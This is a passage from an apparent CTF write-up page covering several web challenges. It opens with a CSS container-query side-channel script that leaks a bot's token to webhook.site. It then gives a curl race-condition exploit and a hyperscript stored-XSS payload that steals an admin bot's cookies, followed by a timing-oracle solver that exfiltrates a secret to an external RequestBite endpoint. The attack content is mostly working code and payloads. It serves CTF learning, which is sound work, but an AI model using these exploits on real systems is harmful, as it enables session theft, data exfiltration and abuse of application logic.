    for idx, ch in enumerate(alphabet, start=1):
        lo = (idx - 1) * bucket_px + half
        hi = idx * bucket_px + half - 1
        if idx == 1:
            lo = 1
        stage = urllib.parse.quote(ch, safe="")
        rules.append(
            f"@container (min-width:{lo}px) and (max-width:{hi}px)"
            f"{{.probe .hit{{background-image:url(https://webhook.site/{token}?stage=ch_{stage})}}}}"
        )
    return "\n".join(rules)


def build_payload(token: str, font_b64: str, alphabet: str):
    bucket_px = 48
    css = f"""
@font-face{{font-family:x;src:url(data:font/woff2;base64,{font_b64}) format('woff2')}}
.profile-content{{background-image:url(https://webhook.site/{token}?stage=control)}}
body{{position:relative!important}}
script:not([src]):has(+script[src*='purify']){{
  display:inline-block!important;
  white-space:pre!important;
  font:64px x!important;
  line-height:1!important;
  color:#000!important;
  anchor-name:--cfg;
}}
.probe{{
  position:absolute;
  left:0;
  top:0;
  position-anchor:--cfg;
  width:anchor-size(--cfg inline);
  height:8px;
  container-type:inline-size;
}}
.hit{{display:block;width:8px;height:8px}}
@container (max-width:1px){{.probe .hit{{background-image:url(https://webhook.site/{token}?stage=nomatch)}}}}
{css_rules_for_alphabet(token, alphabet, bucket_px)}
    """.strip()
    return (
        '<div class="probe"><div class="hit"></div></div>'
        f'<svg xmlns="http://www.w3.org/2000/svg"><style>{css}</style></svg>'
    )


def create_account(base_url: str, username: str, password: str, full_name: str) -> Session:
    sess = Session(base_url)
    with sess.post_form(
        "/auth",
        {
            "username": username,
            "password": password,
            "full_name": full_name,
            "action": "register",
        },
    ) as resp:
        if resp.status not in (200, 302):
            raise RuntimeError(f"registration failed: {resp.status}")
    with sess.post_form(
        "/auth",
        {
            "username": username,
            "password": password,
            "action": "login",
        },
    ) as resp:
        if resp.status not in (200, 302):
            raise RuntimeError(f"login failed: {resp.status}")
    return sess


def update_profile(sess: Session, username: str, payload: str):
    fields = {
        "full_name": f"Solver {username}",
        "headline": "New Member",
        "about": payload,
        "experience": "",
        "education": "",
    }
    with sess.post_form("/profile/edit", fields) as resp:
        if resp.status not in (200, 302):
            raise RuntimeError(f"profile edit failed: {resp.status}")


def submit_report(sess: Session, username: str):
    with sess.post_form("/report", {"username": username}) as resp:
        if resp.status not in (200, 302):
            raise RuntimeError(f"report failed: {resp.status}")


def poll_stage(token: str, timeout: int):
    end = time.time() + timeout
    seen = set()
    while time.time() < end:
        try:
            items = fetch_webhook_requests(token)
        except HTTPError as exc:
            if exc.code == 429:
                time.sleep(2)
                continue
            raise
        for item in items:
            stage = item.get("query", {}).get("stage")
            if isinstance(stage, list):
                stage = stage[0] if stage else ""
            if not stage or stage in seen:
                continue
            seen.add(stage)
            if stage == "control":
                continue
            return stage, items
        time.sleep(2)
    return "", fetch_webhook_requests(token)


def extract_char(
    base_url: str,
    make_font: Path,
    subset_font: Path,
    workdir: Path,
    prefix: str,
    alphabet: str,
    timeout: int,
):
    token = create_webhook_token()
    stamp = int(time.time() * 1000)
    username = f"solver{stamp}"
    password = f"pw{stamp}"
    full_name = f"Solver {stamp}"
    sess = create_account(base_url, username, password, full_name)

    ttf_path = workdir / f"ctx_{stamp}.ttf"
    woff2_path = workdir / f"ctx_{stamp}.woff2"
    font_b64 = build_woff2_font(make_font, subset_font, ttf_path, woff2_path, CONTEXT_PREFIX + prefix, alphabet)
    payload = build_payload(token, font_b64, alphabet)
    update_profile(sess, username, payload)
    submit_report(sess, username)

    stage, items = poll_stage(token, timeout)
    if stage.startswith("ch_"):
        ch = urllib.parse.unquote(stage[3:])
        return ch, username, token, stage, items
    return "", username, token, stage, items


def main():
    parser = argparse.ArgumentParser(description="Extract the report-bot premium token one character at a time.")
    parser.add_argument("--base-url", required=True)
    parser.add_argument("--alphabet", default=DEFAULT_ALPHABET)
    parser.add_argument("--known-prefix", default="")
    parser.add_argument("--timeout", type=int, default=25)
    parser.add_argument("--max-len", type=int, default=64)
    args = parser.parse_args()

    workdir = Path.cwd()
    make_font = workdir / "make_ctx_font.py"
    base_font = workdir / "widthctx.ttf"
    subset_font = workdir / "widthctx_subset_ascii.ttf"
    build_subset_base(base_font, subset_font, args.alphabet)

    token_prefix = args.known_prefix
    for _ in range(args.max_len):
        ch, username, hook, stage, items = extract_char(
            args.base_url,
            make_font,
            subset_font,
            workdir,
            token_prefix,
            args.alphabet,
            args.timeout,
        )
        print(json.dumps({"username": username, "webhook": hook, "stage": stage, "requests": len(items)}))
        if not ch:
            print(f"failed at prefix={token_prefix!r}", file=sys.stderr)
            sys.exit(1)
        if ch == '"':
            print(token_prefix)
            return
        token_prefix += ch
        print(token_prefix, flush=True)
    print("max length reached", file=sys.stderr)
    sys.exit(1)


if __name__ == "__main__":
    main()

minegamble

Description

Welcome to MineGamble, the #1 Pay-to-Win Minecraft server! Ranks are expensive, the economy feels rigged, and their Terms and Conditions update faster than you can read them. Rumor has it that you can directly buy the Owner rank that has support directly from the admins, but that's crazy expensive...

Solution

The solve is two bugs chained together:

POST /api/sell is raceable, so the same inventory can be sold twice concurrently.
Ticket bodies are rendered as raw HTML, and the ticket page CSP allows scripts from https://cdnjs.cloudflare.com, so hyperscript can run in the admin bot when it reviews our ticket.

First, register a user, race the sell endpoint until the balance is over $10000, then buy OWNER.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="http://34.89.194.19:32524"
COOKIE_FILE="owner_cookie.txt"
USERNAME="mg$(date +%s)"
PASSWORD="pw123456"

curl -sS -c "$COOKIE_FILE" \
  -H 'Content-Type: application/json' \
  -d "{\"username\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" \
  "$BASE_URL/api/register" >/dev/null

balance_floor() {
  curl -sS -b "$COOKIE_FILE" "$BASE_URL/api/me" \
    | python3 -c 'import sys,json; print(int(float(json.load(sys.stdin)["balance"])))'
}

buy_dirt() {
  local amount="$1"
  curl -sS -b "$COOKIE_FILE" \
    -H 'Content-Type: application/json' \
    -d "{\"itemId\":1,\"amount\":$amount}" \
    "$BASE_URL/api/shop/buy" >/dev/null
}

sell_twice() {
  local amount="$1"
  curl -sS -b "$COOKIE_FILE" \
    -H 'Content-Type: application/json' \
    -d "{\"itemId\":1,\"amount\":$amount}" \
    "$BASE_URL/api/sell" >/dev/null &
  local pid1=$!

  curl -sS -b "$COOKIE_FILE" \
    -H 'Content-Type: application/json' \
    -d "{\"itemId\":1,\"amount\":$amount}" \
    "$BASE_URL/api/sell" >/dev/null &
  local pid2=$!

  wait "$pid1" "$pid2"
}

for _ in $(seq 1 15); do
  bal="$(balance_floor)"
  [ "$bal" -ge 10000 ] && break
  buy_dirt "$bal"
  sell_twice "$bal"
done

curl -sS -b "$COOKIE_FILE" \
  -H 'Content-Type: application/json' \
  -d '{"rank":"OWNER"}' \
  "$BASE_URL/api/store/buy"

Then submit a support ticket whose body reads document.cookie in the admin bot, logs back into our owner account, and submits the cookie value as a new ticket. The important detail is that the admin session cookie is HttpOnly, but there is also a non-HttpOnly cookie named flag, so document.cookie directly exposes the flag.

<script src="https://cdnjs.cloudflare.com/ajax/libs/hyperscript/0.9.14/_hyperscript.min.js"></script>
<iframe name="sink" style="display:none"></iframe>

<form id="login" method="POST" action="/api/login" target="sink">
  <input type="hidden" name="username" value="OWNER_USERNAME">
  <input type="hidden" name="password" value="OWNER_PASSWORD">
</form>

<form id="post" method="POST" action="/api/ticket" target="sink">
  <input type="hidden" name="subject" value="cookie_loot">
  <textarea id="loot" name="body"></textarea>
</form>

<div _='on load
          if document.cookie is "" then
            put "EMPTY" into #loot
          else
            put document.cookie into #loot
          end
          wait 200ms
          call login.submit()
          wait 1200ms
          call post.submit()'></div>

Submit that HTML as the ticket body:

curl -sS -b owner_cookie.txt \
  -H 'Content-Type: application/json' \
  -d @- http://34.89.194.19:32524/api/ticket <<'EOF'
{"subject":"trigger_cookie","body":"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/hyperscript/0.9.14/_hyperscript.min.js\"></script><iframe name=\"sink\" style=\"display:none\"></iframe><form id=\"login\" method=\"POST\" action=\"/api/login\" target=\"sink\"><input type=\"hidden\" name=\"username\" value=\"OWNER_USERNAME\"><input type=\"hidden\" name=\"password\" value=\"OWNER_PASSWORD\"></form><form id=\"post\" method=\"POST\" action=\"/api/ticket\" target=\"sink\"><input type=\"hidden\" name=\"subject\" value=\"cookie_loot\"><textarea id=\"loot\" name=\"body\"></textarea></form><div _='on load if document.cookie is \"\" then put \"EMPTY\" into #loot else put document.cookie into #loot end wait 200ms call login.submit() wait 1200ms call post.submit()'></div>"}
EOF

When the admin bot reviews the ticket, it creates a new ticket containing:

flag=CTF{232d8f9f99d0a3e440297b4aee4774c2d2e75868c6ec85d585f8410404e56cd1}

svfgp

Description

Web challenge with two public endpoints:

https://svfgp.breakable.live/
https://svfgp-bot.breakable.live/

Bot behavior (from handout bot.js):

Visit challenge origin.
Store flag in localStorage["svfgp.notes.v1"] as a sealed note.
Visit attacker URL.
Sleep 60 seconds.

Challenge bug (from static/app.js):

mode=probe loads sealed secret from localStorage.
If secret.startsWith(candidate) it runs expensive PBKDF2 (3_000_000 iterations).
Then posts {type:"svfgp-probe-done", sid, rid} to window.opener.

This gives a cross-origin timing oracle: correct prefix => slower response.

Solution

I used an attacker page hosted via httpbin base64 endpoint, submitted to the bot. The page repeatedly probes mode=probe&q=<prefix+char> and times the delay until postMessage. Highest timing wins each character. I exfiltrated progress through fetch(..., {mode:"no-cors"}) to RequestBite.

Important reliability points discovered live:

Image beacons fail because bot runs Chrome with --blink-settings=imagesEnabled=false.
Opening many popups at once caused timeouts.
Reusing a single popup and re-navigating it for each probe worked reliably.

Recovered flag: CTF{1390e7327d4c2069a97e3a7f1eafed37e389f9fb9598b183455dc9f6cc2da658}

Solver code used:

#!/usr/bin/env python3
import base64
import json
import random
import string
import time
import urllib.error
import urllib.parse
import urllib.request

BOT_SUBMIT = "https://svfgp-bot.breakable.live/api/submit"
SINK_VIEW = "bd059e7c-84ca-4c38-9a90-c56122ffe85c"
SINK_BASE = f"https://api.requestbite.com/req/{SINK_VIEW}"
SINK_LIST = f"https://api.requestbite.com/v1/inspector/views/{SINK_VIEW}/requests?per_page=200&page=1"
SINK_DETAIL = f"https://api.requestbite.com/v1/inspector/views/{SINK_VIEW}/requests"

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_}"
START_PREFIX = "CTF{"
MAX_CHARS_PER_RUN = 4
REQUEST_TIMEOUT = 20
RUN_TIMEOUT = 240


def http_json(url: str, data: bytes | None = None, headers: dict[str, str] | None = None):
    req = urllib.request.Request(url, data=data, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=REQUEST_TIMEOUT) as r:
            return json.loads(r.read().decode())
    except urllib.error.HTTPError as e:
        body = e.read().decode(errors="replace")
        try:
            parsed = json.loads(body)
        except json.JSONDecodeError:
            raise
        parsed["_status"] = e.code
        return parsed


def build_payload(prefix: str, run_id: str, max_chars: int = MAX_CHARS_PER_RUN) -> str:
    # Compact payload to stay below bot URL limits.
    js = (
        "<script>(async()=>{"
        "B='https://svfgp.breakable.live/?mode=probe';"
        f"S={json.dumps(SINK_BASE)};"
        f"A={json.dumps(ALPHABET)};"
        f"P={json.dumps(prefix)};"
        f"R={json.dumps(run_id)};"
        "W=window.open('about:blank','svfgp_probe');"
        "f=q=>new Promise(z=>{"
        "let sid=Math.random().toString(16).slice(2);"
        "let rid=Math.random().toString(16).slice(2);"
        "let u=B+'&q='+encodeURIComponent(q)+'&sid='+sid+'&rid='+rid;"
        "let t=performance.now();"
        "let d=0;"
        "h=e=>{let x=e.data||{};"
        "if(!d&&x.type=='svfgp-probe-done'&&x.sid==sid&&x.rid==rid){"
        "d=1;removeEventListener('message',h);"
        "z(performance.now()-t)}};"
        "addEventListener('message',h);"
        "setTimeout(()=>{if(!d){removeEventListener('message',h);"
        "z(2600)}},2700);"
        "try{W.location=u}catch(e){removeEventListener('message',h);z(2600)}"
        "});"
        "sl=t=>new Promise(r=>setTimeout(r,t));"
        f"for(i=0;i<{max_chars}&&!P.endsWith('}}');i++){{"
        "m=[];"
        "for(ch of A){m.push([ch,await f(P+ch)]);await sl(8)}"
        "m.sort((a,b)=>b[1]-a[1]);"
        "if(m[0][1]-m[1][1]<150)break;"
        "P+=m[0][0];"
        "fetch(S+'/rs'+R+'?p='+encodeURIComponent(P)+'&b='+m[0][1].toFixed(1)+'&s='+m[1][1].toFixed(1),{mode:'no-cors'}).catch(e=>{});"
        "}"
        "try{W&&W.close()}catch(e){};"
        "fetch(S+'/rd'+R+'?p='+encodeURIComponent(P),{mode:'no-cors'}).catch(e=>{});"
        "})();</script>"
    )
    html = "<!doctype html>" + js
    b64 = base64.b64encode(html.encode()).decode().translate(str.maketrans("+/", "-_"))
    return f"https://httpbin.org/base64/{b64}"


def submit_with_rate_limit(url: str) -> str:
    body = json.dumps({"url": url}).encode()
    headers = {"content-type": "application/json"}
    while True:
        data = http_json(BOT_SUBMIT, data=body, headers=headers)
        if "job" in data:
            return data["job"]["id"]
        if data.get("error", "").startswith("Rate limit"):
            sleep_for = int(data.get("retryAfterSeconds", 60)) + 1
            print(f"[submit] rate-limited, sleeping {sleep_for}s")
            time.sleep(sleep_for)
            continue
        raise RuntimeError(f"submit failed: {data}")


def wait_for_run(run_id: str) -> str:
    target_path = f"/rd{run_id}"
    deadline = time.time() + RUN_TIMEOUT
    while time.time() < deadline:
        listing = http_json(SINK_LIST)
        for req in listing.get("requests", []):
            if req.get("path") == target_path:
                req_id = req["id"]
                detail = http_json(f"{SINK_DETAIL}/{urllib.parse.quote(req_id)}")
                qs = json.loads(detail.get("queryString", "{}"))
                pvals = qs.get("p") or []
                if not pvals:
                    raise RuntimeError(f"done callback missing prefix: {detail}")
                return pvals[0]
        time.sleep(2)
    raise TimeoutError(f"timed out waiting for run {run_id}")


def run():
    prefix = START_PREFIX
    print(f"[start] prefix={prefix}")
    while not prefix.endswith("}"):
        run_id = "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
        url = build_payload(prefix, run_id)
        if len(url) > 1900:
            raise RuntimeError(f"payload URL too long ({len(url)}) at prefix {prefix!r}")

        print(f"[run {run_id}] submit (url len={len(url)}) prefix={prefix}")
        job_id = submit_with_rate_limit(url)
        print(f"[run {run_id}] job={job_id}, waiting for callback")

        new_prefix = wait_for_run(run_id)
        print(f"[run {run_id}] prefix -> {new_prefix}")

        if new_prefix == prefix:
            raise RuntimeError("no progress in run; aborting for manual inspection")
        prefix = new_prefix

    print(f"[flag] {prefix}")


if __name__ == "__main__":
    run()

PreviousHome NextSrdnlenCTF 2026

Last updated 2 minutes ago

hashtagcryptography

hashtagtoxicwaste

hashtagDescription

hashtagSolution

hashtagforensics

hashtagRAM Vault Beacon Malware

hashtagDescription

hashtagSolution

hashtagRelay in the Noise

hashtagDescription

hashtagSolution

hashtagTokio Magic

hashtagDescription

hashtagSolution

hashtagpwn

hashtagatypical heap

hashtagDescription

hashtagSolution

hashtagatyipical-heap-revenge

hashtagDescription

hashtagSolution

hashtagreverse_engineering

hashtagjumpy

hashtagDescription

hashtagSolution

hashtagriga crypto

hashtagDescription

hashtagSolution

hashtagsubstrate

hashtagDescription

hashtagSolution

hashtagthe flag is a lie

hashtagDescription

hashtagSolution

hashtagwebd-art

hashtagDescription

hashtagSolution

hashtagweb

hashtagdemolition

hashtagDescription

hashtagSolution

hashtagnday-1

hashtagDescription

hashtagSolution

hashtaglarpin

hashtagDescription

hashtagSolution

hashtagminegamble

hashtagDescription

hashtagSolution

hashtagsvfgp

hashtagDescription

hashtagSolution

cryptography

toxicwaste

Description

Solution

forensics

RAM Vault Beacon Malware

Description

Solution

Relay in the Noise

Description

Solution

Tokio Magic

Description

Solution

pwn

atypical heap

Description

Solution

atyipical-heap-revenge

Description

Solution

reverse_engineering

jumpy

Description

Solution

riga crypto

Description

Solution

substrate

Description

Solution

the flag is a lie

Description

Solution

webd-art

Description

Solution

web

demolition

Description

Solution

nday-1

Description

Solution

larpin

Description

Solution

minegamble

Description

Solution

svfgp

Description

Solution